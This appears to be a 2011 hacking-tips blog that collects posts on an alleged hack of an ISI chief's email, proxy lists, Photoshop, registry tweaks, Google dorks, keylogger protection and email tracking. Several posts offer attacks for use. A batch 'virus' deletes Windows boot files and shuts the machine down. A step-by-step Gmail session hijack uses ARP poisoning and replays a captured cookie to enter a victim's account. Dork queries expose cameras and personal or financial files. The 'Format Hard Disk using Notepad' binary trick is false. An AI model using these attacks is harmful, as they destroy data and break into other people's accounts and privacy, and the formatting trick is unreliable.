Sunday, July 17, 2011

ISI Chief - Ahmed Shuja Pasha Email ID hacked by Indian Hacker

ISI Chief - Ahmed Shuja Pasha Email ID hacked by Indian Hacker









































An Indian Hacker "
creatrix" Claim to hack into the email id of ISI Chief Ahmed Shuja Pasha's .The Directorate for Inter-Services Intelligence (more commonly known as Inter-Services Intelligence or simply by its initials ISI), is Pakistan's premier intelligence agency, responsible for providing critical national security intelligence assessment to the Government of Pakistan. The ISI is the largest of the three intelligence service agencies of Pakistan, the others being the Intelligence Bureau (IB) and Military Intelligence (MI).Hacker provide some screenshots of Inbox and Documents .

Proof of Hack and some Documents :

Saturday, July 9, 2011

Searchr.us - Search all major Search Engines at once in one place !

Recently i found this site which searches Google,Bing,Yahoo and Wikipedia at once and displays the results in separate frames which makes your work a whole lot better !

Searchr.us - Search all major Search Engines at once in one place !



If you have any suggestions or any bug report then do tell me or just post a comment here !

Site : www.Searchr.us

Download 1500+ Proxy Server's List | All tested and Working Free Proxy Servers



Download 1500+ Proxy Server's List | All tested and Working Free Proxy ServersWhat is a Proxy Server ?

A proxy server which makes you view your desired webpages but not through your originalIP.In short it just protects your IP from being revealed by the website for that matter.For ex. If my IP is "76.74.255.236",what that server does is that it loads the webpage through another IP say, "89.16.178.168" and keeps your IP being tracked/tapped.

List of Proxy Servers:

Here is a small list of proxy servers :

http://proxyhost.org
http://webproxy.dk
http://phproxy.frac.dk
http://phproxy.1go.dk
http://proxify.com
http://home.no.net/roughnex
http://nomorefilter.com
http://rapidwire.net
http://oproxy.info
http://stealth-ip.net
http://cooltunnell.com
http://schoolsurf.com
http://anonymouse.org
http://goodproxy.com
http://nomorefilter.com
http://openweblive.com


For the whole list you can just download it from here :

File Details:
Download: 1500+ Proxy List
Password: hackmeout.blogspot.com
File Size: 9 KB
File Extension: .rar (Compressed Archive)

Wednesday, April 27, 2011

Creating Mustache in face with out mustache using photoshop.

Start by opening an image of a man without mustache.

Press Q to enable quick mask. From filter menu select render>>fibers. Apply settings as shown.

Press Q again to disable quick mask.

Create a new layer and fill the selection with black color.

Create a rectangular selection using rectangular marquee tool. Press Ctrl+Shift+I to invert the selection and press Delete.

Press Ctrl+T. Right Click and select Warp. Adjust the nodes to get the shape as shown.




Double click the layer to open layer style window. Apply settings as shown.




From layer menu select layer style>>create layers. Select and merge both the resulting layers. Click add vector mask button from the bottom of the layer palette.


Select black as foreground color. Using a medium radius brush with feathered settings stroke the hard edges of moustache. These hard edges will be smoothly masked out.



Sunday, April 24, 2011

Virus That Crashes Ur Own PC

Open notepad and type the below commands


@echo

offattrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

Save as any_name.bat file 
and open it...
This will pop up a message saying OWNED!!
And shut down the computer never to reboot again!


start virus.bat
virus.bat
and save as with this name - virus.bat

ur antivirus will not detect this virus.

Basically this program will delete all that files which are needed for bootingIf your os is installed in d drive instead of c:\ then replace c:\ with d:\

Add Copy To And Move To Options Whenever U Right Click On A File


Once done, you will be able to right click any file or folder and use the Browse for Folder dialog to choose the location you want to move or copy your file or folder to, without having to go to the destination path, its cool!

First we will add the copy and move options to the right click menu of all FILES.

CLICK Start>Run, type REGEDIT and click OK to open up the registry editor and make your way to this key:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers

Right click the ContextMenuHandlers key and choose New>Key.
Name the new key “Copy To” (without the quotes).
Repeat the above and create another new key named Move To.

You should now have two new subkeys under the ContextMenuHandlers key:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Copy To
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Move To

Select the Copy To key and in the right hand pane, double click “Default”
Enter this clsid value as the value data:

{C2FBB630-2971-11d1-A18C-00C04FD75D13}

Next , select the Move To key and in the right hand pane set the default value to:

{C2FBB631-2971-11d1-A18C-00C04FD75D13}

This now takes care of the Copy and Move options for the right click context menu of all your files.
Now all that is left is to add the same options to the right click menu of all your folders.
The procedure will be the same as for files but at a different key:

HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHan dlers

Right click ContextMenuHandlers and create a new key named Copy To.
Right click it again and create another new key named Move To.

left click on the right hand pane, add the same default values as you did for Files:

For Copy To:
{C2FBB630-2971-11d1-A18C-00C04FD75D13}
For the Move To:
{C2FBB631-2971-11d1-A18C-00C04FD75D13}

Exit the registry and you are done.

Now when you right click on a file or folder, you should see two new options: Copy to Folder and Move to Folder

Saturday, April 23, 2011

Google serves almost 80 percent of all search queries on the Internet, proving itself as the most popular search engine. However Google makes it possible to reach not only the publicly available information resources, but also gives access to some of the most confidential information that should never have been revealed. In this post I will show how to use Google for exploiting security vulnerabilities within websites. The following are some of the hacks that can be accomplished using Google.


1. Hacking Security Cameras

There exists many security cameras used for monitoring places like parking lots, college campus, road traffic etc. which can be hacked using Google so that you can view the images captured by those cameras in real time. All you have to do is use the following search query in Google. Type in Google search box exactly as follows and hit enter
inurl:”viewerframe?mode=motion”
Click on any of the search results (Top 5 recommended) and you will gain access to the live camera which has full controls. You will see something as follows
As you can see in the above screenshot, you now have access to the Live cameras which work in real-time. You can also move the cameras in all the four directions, perform actions such as zoom in and zoom out. This camera has really a less refresh rate. But there are other search queries through which you can gain access to other cameras which have faster refresh rates. So to access them just use the following search query.
intitle:”Live View / – AXIS”
Click on any of the search results to access a different set of live cameras. Thus you have hacked Security Cameras using Google.

2. Hacking Personal and Confidential Documents

Using Google it is possible to gain access to an email repository containing CV of hundreds of people which were created when applying for their jobs. The documents containing their Address, Phone, DOB, Education, Work experience etc. can be found just in seconds.
intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”
You can gain access to a list of .xls (excel documents) which contain contact details including email addresses of large group of people. To do so type the following search query and hit enter.
filetype:xls inurl:”email.xls”
Also it’s possible to gain access to documents potentially containing information on bank accounts, financial summaries and credit card numbers using the following search query
intitle:index.of finances.xls

3. Hacking Google to gain access to Free Stuffs

Ever wondered how to hack Google for free music or ebooks. Well here is a way to do that. To download free music just enter the following query on google search box and hit enter.
“?intitle:index.of?mp3 eminem
Now you’ll gain access to the whole index of eminem album where in you can download the songs of your choice. Instead of eminem you can subtitute the name of your favorite album. To search for the ebooks all you have to do is replace “eminem” with your favorite book name. Also replace “mp3″ with “pdf” or “zip” or “rar”.

How to Protect Your Computer from Keyloggers

Protect from KeyloggersKeyloggers have been a major problem today as it does not require any prior knowledge of computers to use it. So hackers mainly use keyloggers to steal your passwords, credit card numbers and other confidential data. Below are some methods through which you can protect your computer from keyloggers:
 

Use a Good Antivirus

This is the first and basic step that you need to take in order to protect your computer from keyloggers. Use a Good antivirus such as Kaspersky, Norton or Mcafee and update it regularly.
 

Use a Good Antispyware

Since keyloggers are basically spywares, if you are a frequent user of Internet then you could be exposed to thousands of keyloggers and spywares. So you should use a good antispyware such as NoAdware.
 

Antilogger can be Handy

Antiloggers are programs that detect the presence of keyloggers on a given computer. Over past few years, I have tested a lot of anti-logging programs and have found Zemana Antilogger as the best antilogger.
Zemana
Normally a keylogger can be easily detected by a Good Antivirus program, but hackers use some methods such as hexing, binding, crypting and similar techniques to make it harder to be detected by antivirus programs. In this case Zemana Antilogger comes handy as the program is specially developed to protect your system against harmful keyloggers.
Zemana Antilogger
 

Online Scanning

When ever you receive a suspicious file, you scan it with online scanners such as Multi engine antivirus scanner which scans your file with 24 antivirus engines and reports it back to you if the file is recognized as a virus or spyware. This ensures that none of the malicious programs can escape from being detected as there are 24 different antivirus engines are involved in the scanning process.
 

Sandboxie

Sandboxie is another great program to help you protect your computer against harmful keyloggers and spywares. Sandboxie runs your computer in an isolated space which prevents your program from making permanent changes to other programs in your computer.
When ever you receive a file that looks suspicious, just run the program with Sandboxie so even if it is a keylogger or any other virus it will not make permanent changes to your computer system.
Sandboxie
To run a program in Sandboxie follow the steps as mentioned below:
1. Open sandboxie and click on sandbox menu on the top
2. Now goto Default sandbox
3. Then click on run any program
4. Now select the file you wish to run in sandboxie and click open
 

Keyscrambler

Keyscrambler is one of the best protection against keyloggers that you can have, Keyscrambler is a small program which encrypts your typed keystrokes so even if the victim has installed a keylogger on your system, he or she will get encrypted keys. Keyscrambler currently supports Firefox, Internet explorer and other applications, however its premium version supports more than 160 applications.

Saturday, April 9, 2011

Snaptu: This week's new games

Shift 2: Unleashed, PC, PS3 & Xbox 360

Shift 2: Unleashed attempts to deliver a more seat-of-the-pants feel than other racing games.

Its much vaunted "True Driver Experience" system amounts to an in-car view occluded by helmet and car interior,…


Click here to read the full story

--
This email was sent to you from Snaptu mobile application.

Friday, April 8, 2011

Hacking Gmail using the GX cookie Loophole and Its Solution

NOTE: THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY ! 

 ASSUMPTIONS:

1- You are in Local Area Network (LAN) in a switched / wireless environment : example : office , cyber café, Mall etc.
2- You know basic networking information.

Tool used for this attack:
1- Cain & Abel or Any Ethernet Capturing Tool
2- Network Miner
3- Firefox web browser with Cookie Editor add-ons (anEC Cookie Editor)
(ALL THE TOOLS MENTIONED HERE ARE AVAILABLE FOR FREE DOWNLOADS YOU JUST HAVE TO GOOGLE THEM)

Attack in detail:

We assume you are connected to LAN/Wireless network. Our main goal is to capture Gmail GX cookie from the network. We can only capture cookie when someone is actually using his gmail. I’ve noticed normally in free Classes in College when people normally check their emails. If you are in cyber café or in Mall then there are more chances of catching people using Gmail.

We will go step by step, If you are using Wireless network then you can skip this Step A.

A.) Using Cain to do ARP poisoning and routing:

Switch allows unicast traffic mainly to pass through its ports. When X and Y are communicating eachother in switch network then Z will not come to know what X & Y are communicating, so inorder to sniff that communication you would have to poison ARP table of switch for X & Y. In Wireless you don’t have to do poisoning because Wireless Access points act like HUB which forwards any communication to all its ports (recipients).

-> Start Cain from Start > Program > Cain > Cain
-> Click on Start/Stop Snigger tool icon from the tool bar, we will first scan the network to see what all IPs are used in the network and this list will also help us to launch an attack on the victim.
-> Then click on Sniffer Tab then Host Tab below. Right click within that spreadsheet and click on Scan Mac Addresses, from the Target section select

All hosts in my subnet and then press Ok. This will list all host connected in your network. You will notice you won’t see your Physical IP of your machine in that list. How to check your physical IP ?

-> Click on start > Run type cmd and press enter,
-> In the command prompt type Ipconfig and enter. This should show your IP address assign to your PC.

It will have following outputs:

-> Ethernet adapter Local Area Connection:
-> Connection-specific DNS Suffix . : xyz.com

IP Address. . . . . . . . . . . . : 192.168.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1

Main thing to know here is your IP address and your Default Gateway.
FOR AMU Its : 10.10.50.1
FOR BSNL Its : 192.168.1.1

Make a note of your IP Address & default gateway. From Cain you will see list of IP addresses, here you have to choose any free IP address which is not used anywhere. We assume IP 192.168.1.10 is not used anywhere in the network.

-> Click on Configure > APR > Use Spoof ed IP and MAC Address > IP

Type in 192.168.1.10 and from the poisoning section click on “Use ARP request Packets” and click on OK.

-> Within the Sniffer Tab , below click on APR Tab, from the left hand side click on APR and now click on the right hand top spreadsheet then click on plus sign tool from top. The moment you click that it will show you list of IP address on left hand side. Here we will target the victim IP address and the default gateway.

The purpose is to do ARP poisoning between victim and the default gateway and route the victim traffic via your machine. From the left side click on Victim IP address, we assume victim is using 192.168.1.15. The moment you click on victim IP you will see remaining list on the right hand side here you have to select default gateway IP address i.e. 192.168.1.1 then click on OK.

Finally, Click on Start/Stop Sniffer tool menu once again and next click on Start/Stop APR. This will start poisoning victim and default gateway.

B.) Using Network Miner to capture cookie in plain text

We are using Network miner to capture cookie, but Network miner can be used for manythings from capturing text , image, HTTP parameters, files. Network Miner is normally used in Passive reconnaissance to collect IP, domain and OS finger print of the connected device to your machine. If you don’t have Network miner you can use any other sniffer available like Wireshark, Iris network scanner, NetWitness etc.

We are using This tool because of its ease to use.

-> Open Network Miner by clicking its exe (pls note it requires .Net framework to work).
-> From the “---Select network adaptor in the list---“ click on down arrow and select your adaptor If you are using Ethernet wired network then your adaptor would have Ethernet name and IP address of your machine and if you are using wireless then adaptor name would contain wireless and your IP address. Select the one which you are using and click on start.

Important thing before you start this make sure you are not browsing any websites, or using any Instant Mesaging and you have cleared all cookies from firefox.

-> Click on Credential Tab above. This tab will capture all HTTP cookies , pay a close look on “Host” column you should see somewhere mail.google.com. If you could locate mail.google.com entry then in the same entry right click at Username column and click on “copy username” then open notepad and paste the copied content there.
-> Remove word wrap from notepad and search for GX in the line. Cookie which you have captured will contain many cookies from gmail each would be separated by semicolon ( GX cookie will start with GX= and will end with semicolon you would have to copy everything between = and semicolon

Example : GX= axcvb1mzdwkfefv ; ßcopy only axcvb1mzdwkfefv

Now we have captured GX cookie its time now to use this cookie and replay the attack and log in to victim email id, for this we will use firefox and cookie editor add-ons.

C.) Using Firefox & cookie Editor to replay attack.

-> Open Firefox and log in your gmail email account.
-> From firefox click on Tools > cookie Editor.
-> In the filter box type .google.com and Press Filter and from below list search for cookiename GX. If you locate GX then double click on that GX cookie and then from content box delete everything and paste your captured GX cookie from stepB.4 and click on save and then close.
-> From the Address bar of Firefox type mail.google.com and press enter, this should replay victim GX cookie to Gmail server and you would get logged in to victim Gmail email account.
-> Sorry! You can’t change password with cookie attack.(LIMITATION OF ATTACK)

SOLUTION: HOW TO PROTECT URSELF FROM THIS HACK

Google has provided a way out for this attack where you can use secure cookie instead of unsecure cookie. You can enable secure cookie option to always use https from Gmail settings.
Settings > Browser connection > Always use https .

Monday, April 4, 2011

Find out if your email has been read....

SpyPig Classic
SpyPig Factory: Create your SpyPig tracking image here
Your email address :
Your message title :
Give the email message you want to track a unique title such as the recipient's name and your message subject (e.g. "To Mr. Christo Bear: Let's have lunch!") so you later can identify it from the notifications you'll receive.
Select your SpyPig tracking image :
   

 
  
Copy & paste the SpyPig image above into your email message.

How to copy & paste:
  • On Internet Explorer (Windows):
    Use a right-mouse click to copy the SpyPig image and paste it anywhere into your email message.Outlook user, read this first.
  • On Firefox (Windows):
    Drag the SpyPig image and drop it anywhere into your email message.Outlook user, read this first.
    If you're using a Web-based email client, you might need to open it in a seperate window in order to perform the drag & drop operation.
  • On Safari (Macintosh):
    Highlight the SpyPig image by draging the pointer across the image until it is highlighted, then press Command+C to copy it. Press Command+V to paste it anywhere into your email message.Outlook user, read this first.
  • On other browsers or operating systems:
    Use one of the methods above, or play around until you get it right. Learn more.
Make sure you're using an HTML email, not a plain-text or rich-text email.You should do the copy & paste within 60 seconds before the activation (before the countdown hits 0). If you do it after, it will incorrectly think the recipient has opened your email and send you a notification.
Send your email as usual.
Check also your spam folder for your notification email.

Format Hard Disk using Notepad...!!!!

Write The Following In Notepad Exactly as it says

1. Write the following code:01001011000111110010010101010101010000011111100000
2. Save As it as .EXE and any Name would Do.
3. If u run the program means it will format the Hard Drive.

NOTE: Everything is for learning purpose only!!